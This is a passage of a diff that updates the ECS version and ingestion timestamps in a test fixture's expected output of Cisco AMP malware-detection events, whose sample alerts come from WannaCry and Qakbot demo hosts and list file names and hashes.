Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2747,7 +2747,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2779,7 +2779,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094076786Z",
+                "ingested": "2021-09-13T18:07:42.929525666Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2836,7 +2836,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -2864,7 +2864,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094078741Z",
+                "ingested": "2021-09-13T18:07:42.929527645Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2917,7 +2917,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2937,7 +2937,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094080611Z",
+                "ingested": "2021-09-13T18:07:42.929529537Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2988,7 +2988,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3008,7 +3008,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094082470Z",
+                "ingested": "2021-09-13T18:07:42.929531441Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3072,7 +3072,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3104,7 +3104,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094084360Z",
+                "ingested": "2021-09-13T18:07:42.929533342Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3161,7 +3161,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3181,7 +3181,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:10.094086254Z",
+                "ingested": "2021-09-13T18:07:42.929535291Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T13:29:36.000Z",
@@ -3228,7 +3228,7 @@
         {
             "@timestamp": "2021-01-14T13:28:09.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3246,7 +3246,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:10.094088127Z",
+                "ingested": "2021-09-13T18:07:42.929537188Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6412574627503014000",
                 "kind": "alert"
@@ -3288,7 +3288,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3308,7 +3308,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094089991Z",
+                "ingested": "2021-09-13T18:07:42.929539100Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3365,7 +3365,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3395,7 +3395,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094091860Z",
+                "ingested": "2021-09-13T18:07:42.929540993Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3450,7 +3450,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3480,7 +3480,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094093728Z",
+                "ingested": "2021-09-13T18:07:42.929542884Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3533,7 +3533,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3553,7 +3553,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094095604Z",
+                "ingested": "2021-09-13T18:07:42.929544781Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3608,7 +3608,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3628,7 +3628,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094097475Z",
+                "ingested": "2021-09-13T18:07:42.929546661Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3683,7 +3683,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3703,7 +3703,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094099331Z",
+                "ingested": "2021-09-13T18:07:42.929548553Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3758,7 +3758,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3778,7 +3778,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094101204Z",
+                "ingested": "2021-09-13T18:07:42.929550429Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3833,7 +3833,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3853,7 +3853,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094103078Z",
+                "ingested": "2021-09-13T18:07:42.929552332Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 